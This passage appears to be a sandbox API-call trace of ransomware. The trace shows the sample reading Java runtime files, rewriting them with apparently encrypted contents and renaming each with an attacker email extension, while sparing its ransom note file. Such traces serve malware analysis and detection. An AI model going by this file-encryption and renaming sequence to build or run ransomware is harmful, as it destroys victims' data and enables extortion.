_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0095.391] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="dnsns.jar") returned 0x0 [0095.391] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\dnsns.jar") returned 0x35 [0095.391] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0095.394] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x205e, lpOverlapped=0x0) returned 1 [0095.396] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0095.396] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0095.396] _errno () returned 0x84b1160840 [0095.396] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.396] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x2060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2060, lpOverlapped=0x0) returned 1 [0095.397] CloseHandle (hObject=0x1a8) returned 1 [0095.397] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\dnsns.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0095.397] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0095.397] __uncaught_exception () returned 0x84b1160800 [0095.397] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0095.397] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\dnsns.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\dnsns.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\dnsns.jar.[evil@cock.lu].evil")) returned 1 [0095.398] ??_V@YAXPEAX@Z () returned 0x1 [0095.400] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\dnsns.jar", dwFileAttributes=0x0) returned 0 [0095.400] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0095.400] wcsstr (_Str="jaccess.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0095.400] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jaccess.jar") returned 55 [0095.400] wcscmp (_String1="jaccess.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0095.400] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jaccess.jar") returned 0x0 [0095.400] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jaccess.jar") returned 0x37 [0095.400] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0095.402] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xade4, lpOverlapped=0x0) returned 1 [0095.405] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0095.405] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0095.405] _errno () returned 0x84b1160840 [0095.405] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.405] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xae00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xae00, lpOverlapped=0x0) returned 1 [0095.405] CloseHandle (hObject=0x1a8) returned 1 [0095.405] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jaccess.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0095.405] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0095.405] __uncaught_exception () returned 0x84b1160800 [0095.405] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0095.406] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\jaccess.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jaccess.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\jaccess.jar.[evil@cock.lu].evil")) returned 1 [0095.406] ??_V@YAXPEAX@Z () returned 0x1 [0095.409] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jaccess.jar", dwFileAttributes=0x0) returned 0 [0095.409] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0095.409] wcsstr (_Str="jfxrt.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0095.409] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar") returned 53 [0095.409] wcscmp (_String1="jfxrt.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0095.409] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jfxrt.jar") returned 0x0 [0095.409] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar") returned 0x35 [0095.409] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0095.411] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x100000, lpOverlapped=0x0) returned 1 [0096.075] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0096.076] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0096.076] _errno () returned 0x84b1160840 [0096.077] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.077] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x100020, lpOverlapped=0x0) returned 1 [0096.229] CloseHandle (hObject=0x1a8) returned 1 [0096.240] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0096.241] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0096.241] __uncaught_exception () returned 0x84b1160800 [0096.241] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0096.523] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar.[evil@cock.lu].evil")) returned 1 [0096.524] ??_V@YAXPEAX@Z () returned 0x1 [0096.528] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar", dwFileAttributes=0x0) returned 0 [0096.528] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0096.528] wcsstr (_Str="localedata.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0096.528] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\localedata.jar") returned 58 [0096.528] wcscmp (_String1="localedata.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0096.528] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="localedata.jar") returned 0x0 [0096.528] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\localedata.jar") returned 0x3a [0096.528] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\localedata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0096.530] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x100000, lpOverlapped=0x0) returned 1 [0096.620] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0096.620] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0096.620] _errno () returned 0x84b1160840 [0096.622] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.622] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x100020, lpOverlapped=0x0) returned 1 [0096.632] CloseHandle (hObject=0x1a8) returned 1 [0096.632] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\localedata.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0096.632] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0096.632] __uncaught_exception () returned 0x84b1160800 [0096.632] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0096.765] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\localedata.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\localedata.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\localedata.jar.[evil@cock.lu].evil")) returned 1 [0096.766] ??_V@YAXPEAX@Z () returned 0x1 [0096.771] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\localedata.jar", dwFileAttributes=0x0) returned 0 [0096.772] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0096.772] wcsstr (_Str="meta-index", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0096.772] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\meta-index") returned 54 [0096.772] wcscmp (_String1="meta-index", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0096.772] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="meta-index") returned 0x0 [0096.772] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\meta-index") returned 0x36 [0096.772] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0096.774] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b5, lpOverlapped=0x0) returned 1 [0096.778] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0096.779] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0096.779] _errno () returned 0x84b1160840 [0096.779] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.779] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c0, lpOverlapped=0x0) returned 1 [0096.779] CloseHandle (hObject=0x1a8) returned 1 [0096.779] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\meta-index", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0096.779] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0096.779] __uncaught_exception () returned 0x84b1160800 [0096.779] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0096.780] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\meta-index"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\meta-index.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\meta-index.[evil@cock.lu].evil")) returned 1 [0096.780] ??_V@YAXPEAX@Z () returned 0x1 [0096.784] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\meta-index", dwFileAttributes=0x0) returned 0 [0096.784] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0096.784] wcsstr (_Str="nashorn.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0096.784] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\nashorn.jar") returned 55 [0096.784] wcscmp (_String1="nashorn.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0096.784] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="nashorn.jar") returned 0x0 [0096.784] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\nashorn.jar") returned 0x37 [0096.784] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\nashorn.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0096.787] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x100000, lpOverlapped=0x0) returned 1 [0096.970] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0096.970] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0096.970] _errno () returned 0x84b1160840 [0096.971] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.971] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x100020, lpOverlapped=0x0) returned 1 [0096.997] CloseHandle (hObject=0x1a8) returned 1 [0096.997] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\nashorn.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0096.997] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0096.997] __uncaught_exception () returned 0x84b1160800 [0096.997] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0096.998] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\nashorn.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\nashorn.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\nashorn.jar.[evil@cock.lu].evil")) returned 1 [0096.998] ??_V@YAXPEAX@Z () returned 0x1 [0097.003] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\nashorn.jar", dwFileAttributes=0x0) returned 0 [0097.003] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.003] wcsstr (_Str="sunec.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.003] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunec.jar") returned 53 [0097.003] wcscmp (_String1="sunec.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.003] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sunec.jar") returned 0x0 [0097.003] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunec.jar") returned 0x35 [0097.003] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunec.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.005] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa4aa, lpOverlapped=0x0) returned 1 [0097.009] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.009] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.009] _errno () returned 0x84b1160840 [0097.009] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.009] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xa4c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa4c0, lpOverlapped=0x0) returned 1 [0097.009] CloseHandle (hObject=0x1a8) returned 1 [0097.010] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunec.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.010] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.010] __uncaught_exception () returned 0x84b1160800 [0097.010] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.010] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunec.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunec.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunec.jar.[evil@cock.lu].evil")) returned 1 [0097.012] ??_V@YAXPEAX@Z () returned 0x1 [0097.015] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunec.jar", dwFileAttributes=0x0) returned 0 [0097.015] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.015] wcsstr (_Str="sunjce_provider.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.015] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar") returned 63 [0097.015] wcscmp (_String1="sunjce_provider.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.015] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sunjce_provider.jar") returned 0x0 [0097.015] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar") returned 0x3f [0097.016] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.018] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x44661, lpOverlapped=0x0) returned 1 [0097.028] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.028] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.028] _errno () returned 0x84b1160840 [0097.029] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.029] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x44680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x44680, lpOverlapped=0x0) returned 1 [0097.029] CloseHandle (hObject=0x1a8) returned 1 [0097.029] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.030] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.030] __uncaught_exception () returned 0x84b1160800 [0097.030] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.030] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar.[evil@cock.lu].evil")) returned 1 [0097.031] ??_V@YAXPEAX@Z () returned 0x1 [0097.034] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar", dwFileAttributes=0x0) returned 0 [0097.034] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.034] wcsstr (_Str="sunmscapi.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.034] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar") returned 57 [0097.034] wcscmp (_String1="sunmscapi.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.034] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sunmscapi.jar") returned 0x0 [0097.034] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar") returned 0x39 [0097.034] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.036] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7fbb, lpOverlapped=0x0) returned 1 [0097.039] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.040] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.040] _errno () returned 0x84b1160840 [0097.040] 